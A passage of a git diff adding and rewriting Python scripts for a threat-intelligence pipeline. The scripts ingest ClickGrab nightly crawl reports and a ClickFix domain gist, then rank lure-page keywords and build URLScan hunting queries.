||||
# Drop bare single-char-ish noise and pure numbers.
|
||||
return not k.isdigit()
|
||||
|
||||
|
||||
def _truthy(v) -> bool:
|
||||
return (v is True) or (isinstance(v, str) and v.lower() == "true") \
|
||||
or (isinstance(v, list) and len(v) > 0) or (isinstance(v, (int, float)) and v > 0)
|
||||
|
||||
|
||||
def main() -> None:
|
||||
files = sorted(glob.glob(str(DAYS_DIR / "*.json")))
|
||||
if not files:
|
||||
print(f"ERROR: no cached MHaggis days in {DAYS_DIR}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
kw_sites = Counter() # lure phrase -> # sites it appeared on
|
||||
fam_sites = Counter() # lure-family flag -> # sites
|
||||
n_sites = 0
|
||||
|
||||
for f in files:
|
||||
try:
|
||||
recs = json.loads(Path(f).read_text(encoding="utf-8"))
|
||||
except Exception:
|
||||
continue
|
||||
for r in recs:
|
||||
if not isinstance(r, dict):
|
||||
continue
|
||||
n_sites += 1
|
||||
sk = r.get("SuspiciousKeywords") or []
|
||||
if isinstance(sk, str):
|
||||
sk = [sk]
|
||||
# dedup per site so a phrase repeated on one page counts once
|
||||
phrases = {k.strip().lower() for k in sk if isinstance(k, str) and is_lure_phrase(k)}
|
||||
for p in phrases:
|
||||
kw_sites[p] += 1
|
||||
for flag in LURE_FLAGS:
|
||||
if _truthy(r.get(flag)):
|
||||
fam_sites[flag] += 1
|
||||
|
||||
top = kw_sites.most_common(40)
|
||||
families = fam_sites.most_common()
|
||||
|
||||
# Build URLScan pivots for the highest-signal phrases (skip the very generic
|
||||
# single words; pair each with the clipboard-write API for precision).
|
||||
GENERIC = {"robot", "captcha", "verification", "verify", "human", "checking"}
|
||||
pivots = []
|
||||
for phrase, sites in top:
|
||||
if phrase in GENERIC or len(phrase) < 8:
|
||||
continue
|
||||
q = f'page.body:navigator.clipboard AND page.body:"{phrase}"'
|
||||
pivots.append({
|
||||
"phrase": phrase,
|
||||
"sites": sites,
|
||||
"query": q,
|
||||
"url": "https://urlscan.io/search/#" + quote(q),
|
||||
})
|
||||
if len(pivots) >= 8:
|
||||
break
|
||||
|
||||
data = {
|
||||
"meta": {
|
||||
"generated": datetime.now(timezone.utc).strftime("%Y-%m-%d"),
|
||||
"source": "MHaggis ClickGrab nightly crawls (SuspiciousKeywords)",
|
||||
"sites_analyzed": n_sites,
|
||||
},
|
||||
"lure_keywords": [{"phrase": p, "sites": c} for p, c in top],
|
||||
"lure_families": [{"name": n, "sites": c} for n, c in families],
|
||||
"urlscan_pivots": pivots,
|
||||
}
|
||||
header = ("# Generated by scripts/build_lure_keywords.py — ranked ClickFix lure-page HTML\n"
|
||||
"# keywords from MHaggis crawls, for chokepoint OSINT pivots + IOK matchers (#012).\n\n")
|
||||
OUT_PATH.write_text(header + yaml.safe_dump(data, sort_keys=False, allow_unicode=True, width=4096),
|
||||
encoding="utf-8")
|
||||
|
||||
print(f"sites: {n_sites} | distinct lure phrases: {len(kw_sites)}")
|
||||
print("--- top lure phrases (phrase : #sites) ---")
|
||||
for p, c in top[:20]:
|
||||
print(f" {c:4} {p}")
|
||||
print("--- lure families ---")
|
||||
for n, c in families:
|
||||
print(f" {c:4} {n}")
|
||||
print("--- suggested URLScan pivots ---")
|
||||
for pv in pivots:
|
||||
print(f" [{pv['sites']:4}] {pv['query']}")
|
||||
print(f"\nWritten: {OUT_PATH}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,138 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
ingest_carson_domains.py
|
||||
Fetch Carson Williams' (cdup07) ClickFix domain gist and cache the normalised
|
||||
domain set for the trends generator.
|
||||
|
||||
ROLE (see docs/DECISIONS.md #011): Carson's gist is a domains-ONLY feed — bare
|
||||
hostnames, one per line, refreshed daily (~3.3k domains). It carries no command
|
||||
lines (his richer ClickGrab fork froze 2025-10-09), so it cannot feed the
|
||||
behavioural cradle/evasion stats — those are all MHaggis. Carson's value is
|
||||
breadth: a landscape count (meta.total_domains) and corroboration of staging
|
||||
domains MHaggis also observed.
|
||||
|
||||
HYGIENE: the full domain list stays in gitignored cache only. analyze_clickgrab.py
|
||||
commits the COUNT and the corroboration count to clickgrab_trends.yml, never the
|
||||
list itself.
|
||||
|
||||
Source: https://api.github.com/gists/9f563dfb78a06fad5db794f33ba93a3f
|
||||
Output: cache/clickgrab/carson_domains.json {count, updated, source, domains[]}
|
||||
"""
|
||||
|
||||
import ipaddress
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
|
||||
import requests
|
||||
|
||||
REPO_ROOT = Path(__file__).parent.parent
|
||||
OUT_PATH = REPO_ROOT / "cache" / "clickgrab" / "carson_domains.json"
|
||||
|
||||
GIST_ID = "9f563dfb78a06fad5db794f33ba93a3f"
|
||||
GIST_API = f"https://api.github.com/gists/{GIST_ID}"
|
||||
GIST_FILE = "clickfix_domains.txt"
|
||||
|
||||
HEADERS = {"User-Agent": "detection-chokepoints/clickgrab-ingest",
|
||||
"Accept": "application/vnd.github+json"}
|
||||
|
||||
# A host line: a domain (labels + alpha TLD) OR a bare IPv4. We keep www. and
|
||||
# IPs so the count stays faithful to "how many hosts Carson tracks" (a landscape
|
||||
# stat that should trend with his list). www-stripping happens only at join time
|
||||
# in the generator, where it's needed to match defanged staging domains.
|
||||
RE_DOMAIN = re.compile(r"^(?:[a-z0-9_-]+\.)+[a-z]{2,}$")
|
||||
|
||||
|
||||
def _is_ipv4(s: str) -> bool:
|
||||
"""True only for a well-formed IPv4 — rejects 999.999.999.999 etc. that a loose
|
||||
\\d{1,3} regex would admit, so junk can't inflate the landscape count."""
|
||||
try:
|
||||
ipaddress.IPv4Address(s)
|
||||
return True
|
||||
except ValueError:
|
||||
return False
|
||||
|
||||
|
||||
def normalise(line: str) -> str:
|
||||
"""Lowercase, strip scheme/path/port/comments and a trailing dot. Keep www.
|
||||
and IPs. Returns '' to drop blanks/comments/invalid hosts."""
|
||||
s = line.strip().lower()
|
||||
if not s or s.startswith("#"):
|
||||
return ""
|
||||
s = re.sub(r"^https?://", "", s) # tolerate a stray scheme
|
||||
s = s.split("/", 1)[0].split(":", 1)[0] # drop any path / port
|
||||
s = s.rstrip(".")
|
||||
return s if (RE_DOMAIN.match(s) or _is_ipv4(s)) else ""
|
||||
|
||||
|
||||
def main() -> None:
|
||||
OUT_PATH.parent.mkdir(parents=True, exist_ok=True)
|
||||
try:
|
||||
resp = requests.get(GIST_API, headers=HEADERS, timeout=30)
|
||||
resp.raise_for_status()
|
||||
gist = resp.json()
|
||||
except requests.RequestException as exc:
|
||||
print(f"ERROR fetching gist: {exc}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
files = gist.get("files", {})
|
||||
finfo = files.get(GIST_FILE) or next(iter(files.values()), None)
|
||||
if not finfo:
|
||||
print("ERROR: gist has no files", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
# The gist API inlines file content unless it exceeds ~1 MB (this file is
|
||||
# ~64 KB, so 'truncated' is False); fall back to raw_url just in case — with
|
||||
# the same status/timeout guards, so a 5xx error page can't become the data.
|
||||
content = finfo.get("content")
|
||||
if finfo.get("truncated") or content is None:
|
||||
try:
|
||||
r = requests.get(finfo["raw_url"], headers=HEADERS, timeout=30)
|
||||
r.raise_for_status()
|
||||
content = r.text
|
||||
except requests.RequestException as exc:
|
||||
print(f"ERROR fetching gist raw content: {exc}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
raw_lines = content.splitlines()
|
||||
domains = sorted({d for d in (normalise(ln) for ln in raw_lines) if d})
|
||||
|
||||
# Guard against a transient/empty upstream clobbering the cache with count~0,
|
||||
# which analyze_clickgrab would then publish as total_domains. Refuse to
|
||||
# overwrite a healthy cache with an implausibly small result; keep the last good.
|
||||
prior = None
|
||||
if OUT_PATH.exists():
|
||||
try:
|
||||
prior = json.loads(OUT_PATH.read_text(encoding="utf-8")).get("count")
|
||||
except Exception:
|
||||
prior = None
|
||||
if len(domains) == 0 or (isinstance(prior, int) and prior > 0 and len(domains) < prior * 0.5):
|
||||
print(f"ERROR: refusing to overwrite cache — {len(domains)} domains is implausibly low "
|
||||
f"vs prior {prior} (likely a transient/empty upstream). Keeping last good cache.",
|
||||
file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
# Atomic write: a crash mid-write must not leave truncated JSON the generator
|
||||
# would then json.load.
|
||||
tmp = OUT_PATH.with_name(OUT_PATH.name + ".tmp")
|
||||
tmp.write_text(json.dumps({
|
||||
"count": len(domains),
|
||||
"updated": gist.get("updated_at"),
|
||||
"description": gist.get("description"),
|
||||
"source": f"https://gist.github.com/cdup07/{GIST_ID}",
|
||||
"fetched_utc": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
|
||||
"domains": domains,
|
||||
}, ensure_ascii=False), encoding="utf-8")
|
||||
os.replace(tmp, OUT_PATH)
|
||||
|
||||
dropped = len(raw_lines) - len(domains)
|
||||
print(f"Carson gist: {len(raw_lines)} lines -> {len(domains)} unique domains "
|
||||
f"({dropped} blank/dupe/invalid dropped)")
|
||||
print(f"Updated: {gist.get('updated_at')} | written: {OUT_PATH}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
+205
-380
@@ -1,438 +1,263 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
ingest_clickgrab.py
|
||||
Fetch the last 7 nightly ClickGrab reports from the public GitHub repo and
|
||||
write a deduplicated list of per-URL records to cache/clickgrab_raw.json.
|
||||
Fetch MHaggis ClickGrab nightly reports as plain git blobs and cache them
|
||||
per-day for the trends generator (analyze_clickgrab.py).
|
||||
|
||||
Actual filename format in MHaggis/ClickGrab:
|
||||
nightly_reports/clickgrab_report_YYYYMMDD_HHMMSS.json
|
||||
WHY raw blobs instead of Git LFS (see docs/DECISIONS.md #010):
|
||||
MHaggis exhausted the repo's Git-LFS storage/bandwidth quota and migrated
|
||||
new files to regular git blobs (confirmed in upstream .gitattributes). The
|
||||
old LFS flow (pointer -> LFS batch API -> presigned URL) now returns no
|
||||
href once the budget is gone, so the previous ingest silently wrote zero
|
||||
records. Regular blobs are one plain GET from raw.githubusercontent.com:
|
||||
no token, no batch API, no bandwidth gate.
|
||||
|
||||
Files are stored in Git LFS. Download flow:
|
||||
1. List nightly_reports/ via GitHub Contents API to find files in the
|
||||
last LOOKBACK_DAYS by parsing the YYYYMMDD prefix from each filename.
|
||||
2. Read the LFS pointer (oid, size) from the file's raw content.
|
||||
3. Resolve the real download URL via the GitHub LFS Batch API.
|
||||
4. Download and parse the JSON report.
|
||||
WHY synchronous requests instead of async httpx:
|
||||
We fetch one small file per calendar day (<=~90 sequential GETs for a full
|
||||
backfill, one per normal daily run). The async/concurrency machinery only
|
||||
added complexity around the LFS hop that no longer exists. A straight loop
|
||||
is easier to read and reason about, and the run is I/O-trivial.
|
||||
|
||||
All files within the lookback window are processed concurrently.
|
||||
Source files (raw.githubusercontent.com/MHaggis/ClickGrab/main/):
|
||||
nightly_reports/clickgrab_report_YYYY-MM-DD.json (per-day, ~100 sites)
|
||||
latest_consolidated_report.json (alias for the latest day)
|
||||
|
||||
Requires: GITHUB_TOKEN env var (optional but avoids rate limits and gives
|
||||
LFS access priority). Without it the script uses unauthenticated GitHub API
|
||||
calls (60 req/hr limit) and may hit the repo's LFS bandwidth budget limit.
|
||||
Output (gitignored cache — raw payloads never get committed; see memory-hygiene
|
||||
rule and DECISIONS #001/#011):
|
||||
cache/clickgrab/days/<YYYY-MM-DD>.json one file per day, list of site dicts
|
||||
cache/clickgrab/ingest_log.json run summary
|
||||
|
||||
Output: cache/clickgrab_raw.json
|
||||
Usage:
|
||||
python scripts/ingest_clickgrab.py # last LOOKBACK_DAYS
|
||||
python scripts/ingest_clickgrab.py 2026-05-20 2026-06-15 # explicit backfill range
|
||||
python scripts/ingest_clickgrab.py --since 2026-05-20 # since date -> today
|
||||
|
||||
Env:
|
||||
CLICKGRAB_LOOKBACK_DAYS default 21 (overlap is fine; merge is by-date idempotent)
|
||||
CLICKGRAB_REQUEST_TIMEOUT default 60
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import base64
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
from datetime import date, timedelta
|
||||
from datetime import date, datetime, timedelta, timezone
|
||||
from pathlib import Path
|
||||
from urllib.parse import urlparse
|
||||
|
||||
import httpx
|
||||
from dotenv import load_dotenv
|
||||
import requests
|
||||
|
||||
load_dotenv(Path(__file__).parent.parent / ".env")
|
||||
ISO_RE = re.compile(r"\d{4}-\d{2}-\d{2}")
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Configuration
|
||||
# Paths / config
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
REPO_ROOT = Path(__file__).parent.parent
|
||||
CACHE_DIR = REPO_ROOT / "cache"
|
||||
OUTPUT_PATH = CACHE_DIR / "clickgrab_raw.json"
|
||||
REPO_ROOT = Path(__file__).parent.parent
|
||||
CACHE_DIR = REPO_ROOT / "cache" / "clickgrab"
|
||||
DAYS_DIR = CACHE_DIR / "days"
|
||||
LOG_PATH = CACHE_DIR / "ingest_log.json"
|
||||
|
||||
CLICKGRAB_OWNER = "MHaggis"
|
||||
CLICKGRAB_REPO = "ClickGrab"
|
||||
CLICKGRAB_BRANCH = "main"
|
||||
REPORTS_DIR = "nightly_reports"
|
||||
RAW_BASE = "https://raw.githubusercontent.com/MHaggis/ClickGrab/main"
|
||||
NIGHTLY_URL_TMPL = RAW_BASE + "/nightly_reports/clickgrab_report_{date}.json"
|
||||
CONSOLIDATED_URL = RAW_BASE + "/latest_consolidated_report.json"
|
||||
|
||||
LOOKBACK_DAYS = int(os.getenv("CLICKGRAB_LOOKBACK_DAYS", "7"))
|
||||
REQUEST_TIMEOUT = float(os.getenv("CLICKGRAB_REQUEST_TIMEOUT", "30"))
|
||||
LOOKBACK_DAYS = int(os.getenv("CLICKGRAB_LOOKBACK_DAYS", "21"))
|
||||
REQUEST_TIMEOUT = float(os.getenv("CLICKGRAB_REQUEST_TIMEOUT", "60"))
|
||||
|
||||
GITHUB_API = "https://api.github.com"
|
||||
LFS_BATCH_URL = (
|
||||
f"https://github.com/{CLICKGRAB_OWNER}/{CLICKGRAB_REPO}.git/info/lfs/objects/batch"
|
||||
)
|
||||
HEADERS = {"User-Agent": "detection-chokepoints/clickgrab-ingest"}
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# GitHub API helpers
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _github_headers(token: str | None = None) -> dict:
|
||||
headers = {
|
||||
"User-Agent": "detection-chokepoints/enrichment-pipeline",
|
||||
"Accept": "application/vnd.github+json",
|
||||
}
|
||||
if token:
|
||||
headers["Authorization"] = f"Bearer {token}"
|
||||
return headers
|
||||
def _looks_like_lfs_pointer(text: str) -> bool:
|
||||
"""Old (pre-migration) reports resolve to a ~130-byte LFS pointer stub on raw,
|
||||
not JSON. A real pointer's FIRST line is exactly the git-lfs spec URL and the
|
||||
whole blob is tiny. Gate on BOTH so a real report whose payload merely contains
|
||||
'oid sha256:' (attacker-controlled ClickFix text can) isn't misclassified and
|
||||
silently dropped as 'budget-locked'."""
|
||||
return text.lstrip().startswith("version https://git-lfs") and len(text) < 400
|
||||
|
||||
|
||||
async def _list_report_files(client: httpx.AsyncClient, token: str | None) -> list:
|
||||
"""Return list of {name, sha, size} dicts for files in nightly_reports/."""
|
||||
url = (
|
||||
f"{GITHUB_API}/repos/{CLICKGRAB_OWNER}/{CLICKGRAB_REPO}"
|
||||
f"/contents/{REPORTS_DIR}?ref={CLICKGRAB_BRANCH}"
|
||||
)
|
||||
try:
|
||||
resp = await client.get(url, headers=_github_headers(token), timeout=REQUEST_TIMEOUT)
|
||||
resp.raise_for_status()
|
||||
except httpx.HTTPError as exc:
|
||||
print(f"ERROR listing {REPORTS_DIR}: {exc}", file=sys.stderr)
|
||||
return []
|
||||
|
||||
entries = resp.json()
|
||||
if not isinstance(entries, list):
|
||||
print(f"ERROR: unexpected response listing {REPORTS_DIR}", file=sys.stderr)
|
||||
return []
|
||||
|
||||
return [
|
||||
{"name": e.get("name", ""), "sha": e.get("sha", ""), "size": e.get("size", 0)}
|
||||
for e in entries
|
||||
if e.get("name", "").endswith(".json")
|
||||
and e.get("name") != "latest_consolidated_report.json"
|
||||
]
|
||||
def _report_date(data) -> str:
|
||||
"""The report's own date (YYYY-MM-DD) from report_date/timestamp, or ''. Used to
|
||||
confirm the consolidated alias has actually rolled to the requested day."""
|
||||
if not isinstance(data, dict):
|
||||
return ""
|
||||
for f in ("report_date", "ReportDate", "date"):
|
||||
v = data.get(f)
|
||||
if isinstance(v, str) and ISO_RE.match(v):
|
||||
return v[:10]
|
||||
ts = data.get("timestamp") or data.get("Timestamp") or ""
|
||||
return ts[:10] if isinstance(ts, str) and ISO_RE.match(ts) else ""
|
||||
|
||||
|
||||
def _parse_date_from_filename(filename: str):
|
||||
m = re.search(r"_(\d{8})_", filename)
|
||||
if m:
|
||||
raw = m.group(1)
|
||||
try:
|
||||
return date(int(raw[:4]), int(raw[4:6]), int(raw[6:8]))
|
||||
except ValueError:
|
||||
pass
|
||||
return None
|
||||
|
||||
|
||||
async def _fetch_lfs_pointer(
|
||||
client: httpx.AsyncClient, filename: str, token: str | None
|
||||
) -> tuple:
|
||||
"""Fetch LFS pointer file and return (oid, size) or (None, None)."""
|
||||
url = (
|
||||
f"https://raw.githubusercontent.com/{CLICKGRAB_OWNER}"
|
||||
f"/{CLICKGRAB_REPO}/{CLICKGRAB_BRANCH}/{REPORTS_DIR}/{filename}"
|
||||
)
|
||||
try:
|
||||
resp = await client.get(url, headers=_github_headers(token), timeout=REQUEST_TIMEOUT)
|
||||
resp.raise_for_status()
|
||||
content = resp.text
|
||||
except httpx.HTTPError as exc:
|
||||
print(f" Could not fetch LFS pointer for {filename}: {exc}", file=sys.stderr)
|
||||
return None, None
|
||||
|
||||
oid_m = re.search(r"oid sha256:([0-9a-f]{64})", content)
|
||||
size_m = re.search(r"size (\d+)", content)
|
||||
if oid_m and size_m:
|
||||
return oid_m.group(1), int(size_m.group(1))
|
||||
print(f" {filename}: not a valid LFS pointer", file=sys.stderr)
|
||||
return None, None
|
||||
|
||||
|
||||
async def _resolve_lfs_download_url(
|
||||
oid: str, size: int, client: httpx.AsyncClient, token: str | None
|
||||
) -> str | None:
|
||||
"""Use LFS Batch API to get the real download URL for an LFS object."""
|
||||
headers = {
|
||||
"Content-Type": "application/vnd.git-lfs+json",
|
||||
"Accept": "application/vnd.git-lfs+json",
|
||||
}
|
||||
if token:
|
||||
cred = base64.b64encode(f"token:{token}".encode()).decode()
|
||||
headers["Authorization"] = f"Basic {cred}"
|
||||
|
||||
payload = {
|
||||
"operation": "download",
|
||||
"transfers": ["basic"],
|
||||
"objects": [{"oid": oid, "size": size}],
|
||||
}
|
||||
try:
|
||||
resp = await client.post(
|
||||
LFS_BATCH_URL, json=payload, headers=headers, timeout=REQUEST_TIMEOUT
|
||||
)
|
||||
resp.raise_for_status()
|
||||
except httpx.HTTPError as exc:
|
||||
print(f" LFS batch API error: {exc}", file=sys.stderr)
|
||||
return None
|
||||
|
||||
data = resp.json()
|
||||
objects = data.get("objects", [])
|
||||
if not objects:
|
||||
print(f" LFS batch API returned no objects: {data.get('message', 'unknown')}", file=sys.stderr)
|
||||
return None
|
||||
|
||||
obj = objects[0]
|
||||
error = obj.get("error")
|
||||
if error:
|
||||
print(f" LFS object error: {error.get('message', error)}", file=sys.stderr)
|
||||
return None
|
||||
|
||||
return obj.get("actions", {}).get("download", {}).get("href")
|
||||
|
||||
|
||||
async def _download_lfs_file(download_url: str, client: httpx.AsyncClient):
|
||||
"""Download the actual JSON content from an LFS download URL."""
|
||||
try:
|
||||
# LFS download URLs are pre-signed — send without custom auth headers
|
||||
resp = await client.get(download_url, headers={}, timeout=60)
|
||||
resp.raise_for_status()
|
||||
return resp.json()
|
||||
except httpx.HTTPError as exc:
|
||||
print(f" LFS download failed: {exc}", file=sys.stderr)
|
||||
return None
|
||||
except ValueError as exc:
|
||||
print(f" LFS content JSON parse error: {exc}", file=sys.stderr)
|
||||
return None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Report parsing
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _extract_url(record: dict) -> str:
|
||||
return (
|
||||
record.get("Url") or record.get("URL") or record.get("url")
|
||||
or record.get("SourceUrl") or record.get("source_url") or ""
|
||||
)
|
||||
|
||||
|
||||
def _extract_tags(record: dict) -> list:
|
||||
tags = record.get("Tags") or record.get("tags") or []
|
||||
if isinstance(tags, str):
|
||||
tags = [tags]
|
||||
for field in ("Verdict", "verdict", "DetectionType", "detection_type"):
|
||||
val = record.get(field)
|
||||
if isinstance(val, str) and val:
|
||||
tags = list(tags) + [val]
|
||||
return [str(t).strip() for t in tags if t]
|
||||
|
||||
|
||||
def _extract_redirect_chain(record: dict) -> list:
|
||||
chain = (
|
||||
record.get("RedirectChain") or record.get("redirect_chain")
|
||||
or record.get("Redirects") or []
|
||||
)
|
||||
if isinstance(chain, str):
|
||||
chain = [chain]
|
||||
return [str(u).strip() for u in chain if u]
|
||||
|
||||
|
||||
def _extract_downloaded_files(record: dict) -> list:
|
||||
files = []
|
||||
for dl in (record.get("PowerShellDownloads") or []):
|
||||
if not isinstance(dl, dict):
|
||||
continue
|
||||
fname = dl.get("FileName") or dl.get("file_name") or dl.get("SavedAs") or ""
|
||||
if not fname:
|
||||
url = dl.get("URL") or dl.get("url") or ""
|
||||
try:
|
||||
fname = Path(urlparse(url).path).name
|
||||
except Exception:
|
||||
pass
|
||||
if fname:
|
||||
files.append(str(fname).strip())
|
||||
direct = record.get("DownloadedFiles") or record.get("downloaded_files") or []
|
||||
if isinstance(direct, str):
|
||||
direct = [direct]
|
||||
files.extend(str(f).strip() for f in direct if f)
|
||||
return list(dict.fromkeys(files))
|
||||
|
||||
|
||||
def _extract_script_snippets(record: dict, max_len: int = 350) -> list:
|
||||
parts = []
|
||||
for field in ("PowerShellCommands", "HighRiskCommands", "ClipboardCommands"):
|
||||
val = record.get(field)
|
||||
if isinstance(val, str) and val:
|
||||
parts.append(val[:max_len])
|
||||
elif isinstance(val, list):
|
||||
for item in val:
|
||||
if item:
|
||||
parts.append(str(item)[:max_len])
|
||||
return parts[:5]
|
||||
|
||||
|
||||
def _extract_risk_score(record: dict) -> int:
|
||||
score = (
|
||||
record.get("ThreatScore") or record.get("threat_score")
|
||||
or record.get("RiskScore") or 0
|
||||
)
|
||||
try:
|
||||
return int(float(score))
|
||||
except (TypeError, ValueError):
|
||||
return 0
|
||||
|
||||
|
||||
def _parse_site_record(record: dict, report_date: str):
|
||||
url = _extract_url(record)
|
||||
if not url:
|
||||
return None
|
||||
return {
|
||||
"url": url,
|
||||
"date": report_date,
|
||||
"tags": _extract_tags(record),
|
||||
"redirect_chain": _extract_redirect_chain(record),
|
||||
"downloaded_files": _extract_downloaded_files(record),
|
||||
"script_snippets": _extract_script_snippets(record),
|
||||
"risk_score": _extract_risk_score(record),
|
||||
}
|
||||
|
||||
|
||||
def _parse_report(data, report_date: str) -> list:
|
||||
"""Extract site records from a raw report (handles list or dict top-level)."""
|
||||
records: list = []
|
||||
|
||||
def _collect_sites(site_list, rdate):
|
||||
for site in site_list:
|
||||
if not isinstance(site, dict):
|
||||
continue
|
||||
r = _parse_site_record(site, rdate)
|
||||
if r:
|
||||
records.append(r)
|
||||
|
||||
def _extract_sites(data) -> list:
|
||||
"""A nightly/consolidated report is a dict with a 'sites' list. Be tolerant
|
||||
of the older capitalised 'Sites' and of a bare top-level list."""
|
||||
if isinstance(data, dict):
|
||||
return data.get("sites") or data.get("Sites") or []
|
||||
if isinstance(data, list):
|
||||
for item in data:
|
||||
if not isinstance(item, dict):
|
||||
continue
|
||||
site_list = item.get("Sites") or item.get("sites") or []
|
||||
if site_list:
|
||||
rdate = (
|
||||
(item.get("ReportTime") or item.get("report_date") or report_date or "")[:10]
|
||||
or report_date
|
||||
)
|
||||
_collect_sites(site_list, rdate)
|
||||
elif _extract_url(item):
|
||||
r = _parse_site_record(item, report_date)
|
||||
if r:
|
||||
records.append(r)
|
||||
elif isinstance(data, dict):
|
||||
site_list = data.get("Sites") or data.get("sites") or []
|
||||
rdate = (
|
||||
(data.get("ReportTime") or data.get("report_date") or report_date or "")[:10]
|
||||
or report_date
|
||||
)
|
||||
_collect_sites(site_list, rdate)
|
||||
return data
|
||||
return []
|
||||
|
||||
return records
|
||||
|
||||
def _normalise_day_records(sites: list, day: str) -> list:
|
||||
"""Stamp each site with the report date under 'Timestamp' so the generator
|
||||
has a reliable per-record date regardless of the upstream field name.
|
||||
Records are stored verbatim otherwise (the generator reads PowerShellCommands,
|
||||
PowerShellDownloads, ThreatScore, Verdict, etc. directly)."""
|
||||
out = []
|
||||
for s in sites:
|
||||
if not isinstance(s, dict):
|
||||
continue
|
||||
s = dict(s)
|
||||
s.setdefault("Timestamp", day)
|
||||
out.append(s)
|
||||
return out
|
||||
|
||||
|
||||
def _fetch_json(url: str) -> tuple:
|
||||
"""GET a raw blob. Returns (status, data_or_None, note).
|
||||
note distinguishes the skip reasons so the run log is diagnosable."""
|
||||
try:
|
||||
resp = requests.get(url, headers=HEADERS, timeout=REQUEST_TIMEOUT)
|
||||
except requests.RequestException as exc:
|
||||
return ("error", None, f"request failed: {exc}")
|
||||
|
||||
if resp.status_code == 404:
|
||||
return ("missing", None, "404 (no report this day)")
|
||||
if resp.status_code != 200:
|
||||
return ("error", None, f"HTTP {resp.status_code}")
|
||||
|
||||
text = resp.text
|
||||
if _looks_like_lfs_pointer(text):
|
||||
return ("lfs_locked", None, "LFS pointer (pre-migration, budget-locked)")
|
||||
|
||||
try:
|
||||
return ("ok", json.loads(text), "")
|
||||
except ValueError as exc:
|
||||
return ("error", None, f"JSON parse error: {exc}")
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Run log
|
||||
# Date range resolution
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _write_run_log(cache_dir: Path, section: str, data: dict) -> None:
|
||||
import datetime as _dt
|
||||
path = cache_dir / "pipeline_run.json"
|
||||
log: dict = {}
|
||||
if path.exists():
|
||||
try:
|
||||
log = json.loads(path.read_text(encoding="utf-8"))
|
||||
except Exception:
|
||||
pass
|
||||
log.setdefault("run_date", _dt.date.today().isoformat())
|
||||
log[section] = {"timestamp": _dt.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ"), **data}
|
||||
path.write_text(json.dumps(log, indent=2), encoding="utf-8")
|
||||
def _parse_date(s: str) -> date:
|
||||
return datetime.strptime(s, "%Y-%m-%d").date()
|
||||
|
||||
|
||||
def _resolve_range(argv: list) -> tuple:
|
||||
"""Resolve the [start, end] inclusive date range to fetch.
|
||||
(no args) -> last LOOKBACK_DAYS ending today
|
||||
--since YYYY-MM-DD -> that date through today
|
||||
YYYY-MM-DD YYYY-MM-DD -> explicit inclusive range
|
||||
"""
|
||||
today = datetime.now(timezone.utc).date()
|
||||
if not argv:
|
||||
return today - timedelta(days=LOOKBACK_DAYS - 1), today
|
||||
if argv[0] == "--since" and len(argv) >= 2:
|
||||
return _parse_date(argv[1]), today
|
||||
if len(argv) >= 2:
|
||||
return _parse_date(argv[0]), _parse_date(argv[1])
|
||||
# single date -> just that day
|
||||
d = _parse_date(argv[0])
|
||||
return d, d
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Main
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
async def main():
|
||||
CACHE_DIR.mkdir(parents=True, exist_ok=True)
|
||||
def main() -> None:
|
||||
DAYS_DIR.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
today = date.today()
|
||||
cutoff = today - timedelta(days=LOOKBACK_DAYS)
|
||||
token = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
||||
start, end = _resolve_range(sys.argv[1:])
|
||||
today = datetime.now(timezone.utc).date()
|
||||
print(f"Fetching ClickGrab nightly blobs {start} -> {end}")
|
||||
|
||||
print(f"Fetching ClickGrab reports from {cutoff} → {today}")
|
||||
print(f"Listing {REPORTS_DIR}/ via GitHub API…")
|
||||
if token:
|
||||
print(" Using GITHUB_TOKEN for authenticated API access")
|
||||
else:
|
||||
print(" No GITHUB_TOKEN — using unauthenticated (60 req/hr limit)")
|
||||
stats = {"days_requested": 0, "days_written": 0, "sites_total": 0,
|
||||
"missing": 0, "lfs_locked": 0, "empty": 0, "errors": 0}
|
||||
day_status = {} # per-day outcome, so a broken 'today' isn't masked by good cached days
|
||||
|
||||
async with httpx.AsyncClient() as client:
|
||||
all_files = await _list_report_files(client, token)
|
||||
print(f" Found {len(all_files)} JSON files in {REPORTS_DIR}/")
|
||||
d = start
|
||||
while d <= end:
|
||||
stats["days_requested"] += 1
|
||||
day = d.isoformat()
|
||||
url = NIGHTLY_URL_TMPL.format(date=day)
|
||||
status, data, note = _fetch_json(url)
|
||||
|
||||
recent_files = [
|
||||
(f["name"], d)
|
||||
for f in all_files
|
||||
if (d := _parse_date_from_filename(f["name"])) and d >= cutoff
|
||||
]
|
||||
recent_files.sort(key=lambda x: x[1], reverse=True)
|
||||
print(f" {len(recent_files)} files in last {LOOKBACK_DAYS} days")
|
||||
# The latest day's nightly file is occasionally published a few minutes
|
||||
# after the consolidated alias; fall back to the consolidated report for
|
||||
# "today" — but ONLY if the alias has actually rolled to today. During the
|
||||
